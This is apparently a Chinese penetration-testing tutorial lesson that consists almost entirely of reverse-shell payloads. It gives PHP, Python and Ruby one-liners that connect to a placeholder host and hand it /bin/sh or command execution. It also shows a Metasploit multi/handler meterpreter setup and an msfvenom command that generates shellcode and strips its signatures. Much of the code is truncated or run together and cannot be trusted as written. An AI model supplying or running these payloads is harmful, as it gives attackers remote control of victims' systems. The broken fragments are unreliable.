基于第十课补充 Payload 1

    这次主要补充了 PHP,python,ruby。

    ps:在线代码高亮:

    1. php error_reporting(0 $ip = 'x.x.x.x'; $port = 53; if (($f = 'stream_socket_client') && is_callable($f)) {
    2. {$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_
    3. strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s;
    4. $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('s
    5. >

    1. <?php
    2. $sock=fsockopen("xx.xx.xx.xx",xxexec("/bin/sh -i <&3 >&3 2>&3"

    第十四课:基于第十课补充payload1 - 图1

    1. msf > use exploit/multi/handler
    2. payload => windows/meterpreter/reverse_tcp
    3. msf exploit(handler) > set LHOST 192.168.1.107
    4. LHOST => 192.168.1.107
    1. import socket,subprocess,os;
    2. s=socket.socket(socket.AF_INET,socket.SOCK_STREAMs.connect(("xx.xx.xx.xx",xx));
    3. i"]);

    1. import socket import subprocess
    2. s=socket.socket()
    3. s.connect(("xx.xx.xx.xx",xx))
    4. p = subprocess.Popen(s.recv(1024),
    5. shell=True,
    6. stdout=subprocess.PIPE,
    7. stderr=subprocess.PIPE,
    8. stdin=subprocess.send(p.stdout.read() + p.stderr.read()
    9. )

    第十四课:基于第十课补充payload1 - 图2

    删除特征:

    1. root@John:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'

    1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx", x$stdin.reopen(c$stdout.reopen(c$stderr.reopen(c$stdi
    2. (IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil}

    第十四课:基于第十课补充payload1 - 图3

    1. require 'socket';c=TCPSocket.new("xx.xx.xx.xx","xx"while(cmd=c.getsIO.popen(cmd,"r"){|io|c.print io.read}end

    第十四课:基于第十课补充payload1 - 图4

    —By Micropoor